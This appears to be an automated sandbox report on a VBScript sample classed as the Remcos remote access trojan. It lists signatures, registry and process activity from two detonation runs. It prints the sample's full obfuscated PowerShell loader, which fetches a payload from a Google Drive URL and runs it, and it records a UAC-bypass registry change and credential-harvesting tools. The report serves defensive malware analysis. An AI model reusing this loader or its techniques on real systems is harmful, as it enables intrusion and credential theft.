Malware Analysis Report

2025-04-03 14:14

Sample ID 241105-e68j6svckb
Target f592c9039e109241cbfd30ae6b0ec2c1098b10ca1dfa80eb427edea6564265f5.vbs
SHA256 f592c9039e109241cbfd30ae6b0ec2c1098b10ca1dfa80eb427edea6564265f5
Tags
discovery remcos remotehost collection credential_access evasion rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f592c9039e109241cbfd30ae6b0ec2c1098b10ca1dfa80eb427edea6564265f5

Threat Level: Known bad

The file f592c9039e109241cbfd30ae6b0ec2c1098b10ca1dfa80eb427edea6564265f5.vbs was found to be: Known bad.

Malicious Activity Summary

discovery remcos remotehost collection credential_access evasion rat stealer trojan

UAC bypass

Remcos

Remcos family

NirSoft WebBrowserPassView

Detected Nirsoft tools

NirSoft MailPassView

Blocklisted process makes network request

Uses browser remote debugging

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Network Service Discovery

Accesses Microsoft Outlook accounts

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies registry key

Suspicious behavior: MapViewOfSection

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-05 04:34

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-05 04:34

Reported

2024-11-05 04:36

Platform

win7-20240903-en

Max time kernel

150s

Max time network

122s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f592c9039e109241cbfd30ae6b0ec2c1098b10ca1dfa80eb427edea6564265f5.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f592c9039e109241cbfd30ae6b0ec2c1098b10ca1dfa80eb427edea6564265f5.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hjremarginerne Pastelfarvens Electroscission Luksusgenstande #>;$problemers='Kongebonde';<#Prowled Svovlsurt Regionsplanretningsliniens Oprindeligt tankskib Pantstterens Schleichera #>; function Umaadeholdenhed($Targes){If ($host.DebuggerEnabled) {$Animatist++;}$Decimerende=$Promonarchists+$Targes.'Length' - $Animatist; for ( $Ordinres=4;$Ordinres -lt $Decimerende;$Ordinres+=5){$rallyes=$Ordinres;$Notationsformernes+=$Targes[$Ordinres];}$Notationsformernes;}function Disrespecter($Savouriest){ & ($Overassertion) ($Savouriest);}$Godmaking=Umaadeholdenhed ' Fi,MsvmmoEphazUnsei mkalAnthlS,mfaTvil/Jimm ';$Nadia=Umaadeholdenhed 'K geTAfsmlIsodsIndf1Fuld2Vest ';$Nerver='Ini [H ran.akte J cT Je,.Wep.sOmgre IndRMemoVBullIAnneC ValESlynpPaafoSejlIprotnSocit ForM ennaIllenFwoma ,evgRe.neHarmRcont]Bak : dbe: linSRoboE UndCOut UKalkrSu iIA.trTamm y arPCounr HenOrrflT ndro,okicFyldOMe llDefi=Pala$StudN UniaSnftDDekuI linAGyne ';$Godmaking+=Umaadeholdenhed 'Vvre5 Tr . Mor0Incl Ador(ExpoW Fari in nSkatd.nfao erswFo ls ol NonnNFiskTFrem A.sa1 pr0Skr . Bat0 L b;Samm EnteWKal,i drunDe i6 For4 ot;Tilh AuguxBage6Pead4Unde;to v Manlr KodvTrav:Brit1wate3Mod,1 kam.Gav,0Disp)Cha ,isiGVelfe Re,c HerkFredoTiko/Indd2Rand0.ubt1Arca0 Sm,0Teks1 Sel0Indu1Udta harpFUdkriPendr vere UnffKlaro angxh ez/Sole1Luft3T.av1,rem.Bys.0Immo ';$Sabotagen=Umaadeholdenhed 'KalkUIndhShru,E EthrPres-indiaCa og SufEPensNPaeat For ';$Gefulltefish=Umaadeholdenhed ' kruh BestKlodt Comp ives Fo.:Dile/Hjem/Aandd ,enrWhisiBr,nv Flse Bus.Cromg.iasoKo soStetg orslIncleMart. ollc Sv o.ubtmF.jl/EfteuAs.ecObse?.augeCounxPolypEbonoS lfrk ngtAkku=UrosdspisoAbasw SkanIn.alGru oNedsaSknkd art&AzotiBlepdBjer=Divi1,rmi9Brani.lleuharc6Ca p4 Evom rev- Kiwn AerlMordz Che4NyerZK,nskOuts_BizaAUnt,kUndeo AmpVGrunG UndwUnre_ResecWardzAdjoESiegW FluuTouc6Unprs W,i1Ledewmongx nti4 Agr ';$Tripl=Umaadeholdenhed 'Se.i>Best ';$Overassertion=Umaadeholdenhed 'UndeiunmaEAn hx Qua ';$Regnearter='Celebriteternes119';$dryptrringens='\Trosbekendelsers.Kas';Disrespecter (Umaadeholdenhed ' Fls$KartG adrlNonro R,dBTrava sp LR as: eorqCustuTolda vanKLgelENonaRScroi DisCTest=G.de$OphvESwi NAfmiVAdve:LaanaSpndPSta PBlacDIde aAnakt No aUndd+ S n$ DioDFkalR fjeY tfPOs eTBlearR.grRRigsIFredNLommg anseKoncNUnv sTykt ');Disrespecter (Umaadeholdenhed ' min$P,lmGPhytLKildoHeksB dipASprelSa d:InfiTHoloU SynRBrasTLo.eLGnu ECondD Rox=be a$ CoegSabeE JuvFStvnU KrllK.rklmatrTSt.lEImitf no,iSkobSReseHLem..Gaagshy ePAlliLEntrICophTC mm( en$ScotTTragr Da iF ltP,skrlOpa )Nont ');Disrespecter (Umaadeholdenhed $Nerver);$Gefulltefish=$turtled[0];$Spisevogns=(Umaadeholdenhed ' Tok$StregInteLRashOParobbindaPapilrewa:For,hShesIAnguSMo,otCeyloBogcnSoubE qui=.pryN olieMatrWSpro-K,pko TribDetejDataEUnsuC tatDhun FysiSNov YMadasKaoltGaouEB,llM .in.Pik.NNonpeCarrTTaar.JgerWNykueQuodbLigecWashL dsaiTautEUnl n andtDi.s ');Disrespecter ($Spisevogns);Disrespecter (Umaadeholdenhed 'Lumi$sci hForaiBa os ProtGsteoUnivn traeNon .AggrH amseStbeaAci dM dkeBugtrSubds bre[Unpe$U sySi daaJvnfbGlyco UdktLieba .ergSkumebar npama]Flyd= U.i$ErgoGTan oBilldAmorm laaMi ikChoniTi bn nngHale ');$Incomprehended=Umaadeholdenhed 'Serp$ ernhBehaiNonds Re tUndeoSlovnForhe Str.CrisD MagoClonwB,rwnRusll KviostejaNatudPulsFFo miVacalMarceCowo(A to$W,doG SveetilsfHenvu inhlundelForttK aleKredf CroiXenosOc eh Dis,B,er$ ineRTndeeSkmteSa,nn B ulSkraiP.alsAlfat K.uiAfhjn antgStvr) ,ic ';$Reenlisting=$quakeric;Disrespecter (Umaadeholdenhed ' Squ$FrucG KyslUn.eOHundBNonaAForkLUnte:Photqb.inUJoinEInteM UdlAgranDSm doFors=Alve(ElekTEctreUrimsPar t f r-Ko tpOrdraOb iT Fa Hr of Prim$HoejRLe iEMedde S.iNBlokLOffeIDidoSPrfaTHymnIMaanNMajeGObdu)Suba ');while (!$quemado) {Disrespecter (Umaadeholdenhed 'Slut$Hemog,esmlMello MurbSlagaR ddlSter:SupeFTri,nOveruTwopgdebufTol,r Ocei Oute.men= Fje$PeritSmrrrHkleuConteEmpi ') ;Disrespecter $Incomprehended;Disrespecter (Umaadeholdenhed 'Svans TkkTvidea CloR ndutStil-KlipsCop lInosE emoeMongPPseu Refo4Spnd ');Disrespecter (Umaadeholdenhed 'Amph$EpheGPalml U voGennBDynaAOv.rl Sej: recqTestUBelrEt faMRingA Aphd oplOPoli= Unc(LightOff ERe eSDi itMona-AkkopAnimaNonfTTirrH Kin Al e$Nic.rMi rerovfeSigtnM jklanglIC ntSSkaftopreIOccunOr gGLino)Sig. ') ;Disrespecter (Umaadeholdenhed 'Soja$Tu ig,andLP edo MamBHockADatalFavn:OpfiRsyntES ifLG.rmaTa,kXOd eAKnstnMer t Ter=Kach$ asiG leuLUd aOUn ebMi,lAPreaLBai.:UnreP ExqrPolieT.irc,lloIRu.dRfalscSmaguSpecl EpiAA,chTKva eB.eg+ red+Resp%Cont$BalsTDis,U GodrF nat Intl co,E Oz DFre . Pi,C ompO etcUMininFestT,ksa ') ;$Gefulltefish=$turtled[$Relaxant];}$Fensmark=316424;$Raptusernes158=29872;Disrespecter (Umaadeholdenhed ' vru$ ShogStryLUrproSeclBZ.omaWileLFr a: Ca,nIgnaOUnfiNAppliPlanNFallT oneSammrBes,p UnhRKostEChamTBlomaEmbabCirkI.ampLInviiPladtSp lY Deb Samm=.col SquaG antEForfTC ga- LufcShoao TetnHjreTRegnENephnDacaTSwin Napo$Un xrpianEBli,EfilinHis L ideiCrumsTilbTbedyIHr sNBal,gDisk ');Disrespecter (Umaadeholdenhed ' Afh$MansgAtrolKar,oCostbSc ea ManlH er:Str OOxeapReprbA faeOutcvAnc aPacerTrkaiPennn blugGenesRat,sGreetta,meMal dSuggsFogg Non= Sel Vels[ FlaSTomoyVitrs raft nsieChurmDi.t.Ort CS uio podn angvJeaneAvler B.dt lec]Titi:Akts:In,pF emirRundoMagim ,duB Ud.aForms CoueUldt6Ecch4 UndSshiktAdulr FotiOutbnCancgCaro(Komm$ simN EksoRecanGenbiRygen.kvhtFil,eRrfrr SejpI dfrSpireTilktNotaaCornbKom,iPurilCykeiVorttBaigymedi)i.dt ');Disrespecter (Umaadeholdenhed ' nst$ tregPrinlBloko FinbCameAHandlPa k:TweeL De E GylvSupreTrykVDa te,andJAntie EufSBes. Tryk=D.fe eta[,avisS raYFal SUnabTMo oeOplomStro. RadTForsE Pl xB,lltduod.Imp eBanjnMus CInteo gladSteeIEtf.N .orGkr s]Ulff: Roc:RenvAAfspsfermC SkoiTilii C y.DestGBifoeChootSn.ts HeltGermRCithIGubeNNedsgAjax( Bde$MilloFletPFre,bAccoe,ltfvO dtAIn.er Su,I FarnGramg nomSGivesm,vetHe aeBed DLoneSF,em) emi ');Disrespecter (Umaadeholdenhed 'Ikeb$Lej GRgerlAtmooNonmbAmarAJensL Inv:Hamil R,tAOverSAkkoESociR SkoPBundRDaydiVestnspecT UnseSpalROutsDtalvEPr afTherI TogNOv rI regTSuprI BinOWoodnc rds U l=Rigs$ NatL OutEM trvBurle P cVGurnET anJ GolENormSsubj.R ngSDiplUVensb,olsSWildt coorRegiIHollNU,trg Dr (Evac$SenefFonteGoveN D ms chrmXystaSta r LevK imm, Kom$A,toRRecoaEi,ePTetrt onsu oorsBro EBaanr DagnSkolE BorsDobb1Sand5Ypp 8Damp)Unde ');Disrespecter $Laserprinterdefinitions;"

Network

Files

C:\Users\Admin\AppData\Local\Temp\CabE66B.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/2960-20-0x000007FEF55EE000-0x000007FEF55EF000-memory.dmp

memory/2960-21-0x000000001B460000-0x000000001B742000-memory.dmp

memory/2960-23-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

memory/2960-22-0x00000000029A0000-0x00000000029A8000-memory.dmp

memory/2960-24-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

memory/2960-25-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

memory/2960-26-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

memory/2960-27-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

memory/2960-28-0x000007FEF55EE000-0x000007FEF55EF000-memory.dmp

memory/2960-29-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

memory/2960-30-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

memory/2960-31-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

memory/2960-32-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

memory/2960-33-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-05 04:34

Reported

2024-11-05 04:36

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

147s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f592c9039e109241cbfd30ae6b0ec2c1098b10ca1dfa80eb427edea6564265f5.vbs"

Signatures

Remcos

rat remcos

Remcos family

remcos

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 5072 set thread context of 116 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 5072 set thread context of 1004 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 5072 set thread context of 4796 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\Chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4700 wrote to memory of 5024 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4700 wrote to memory of 5024 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 64 wrote to memory of 5072 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 64 wrote to memory of 5072 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 64 wrote to memory of 5072 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 64 wrote to memory of 5072 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 5072 wrote to memory of 2056 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 5072 wrote to memory of 2056 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 5072 wrote to memory of 2056 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 2056 wrote to memory of 3600 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2056 wrote to memory of 3600 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2056 wrote to memory of 3600 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 5072 wrote to memory of 2004 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5072 wrote to memory of 2004 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2004 wrote to memory of 1152 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2004 wrote to memory of 1152 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5072 wrote to memory of 4072 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 5072 wrote to memory of 4072 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 5072 wrote to memory of 4072 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 5072 wrote to memory of 116 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 5072 wrote to memory of 116 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 5072 wrote to memory of 116 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 5072 wrote to memory of 116 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 5072 wrote to memory of 1004 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 5072 wrote to memory of 1004 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 5072 wrote to memory of 1004 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 5072 wrote to memory of 1004 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 5072 wrote to memory of 4796 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 5072 wrote to memory of 4796 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 5072 wrote to memory of 4796 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 5072 wrote to memory of 4796 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2004 wrote to memory of 404 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2004 wrote to memory of 404 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2004 wrote to memory of 404 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2004 wrote to memory of 404 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2004 wrote to memory of 404 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2004 wrote to memory of 404 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2004 wrote to memory of 404 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2004 wrote to memory of 404 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
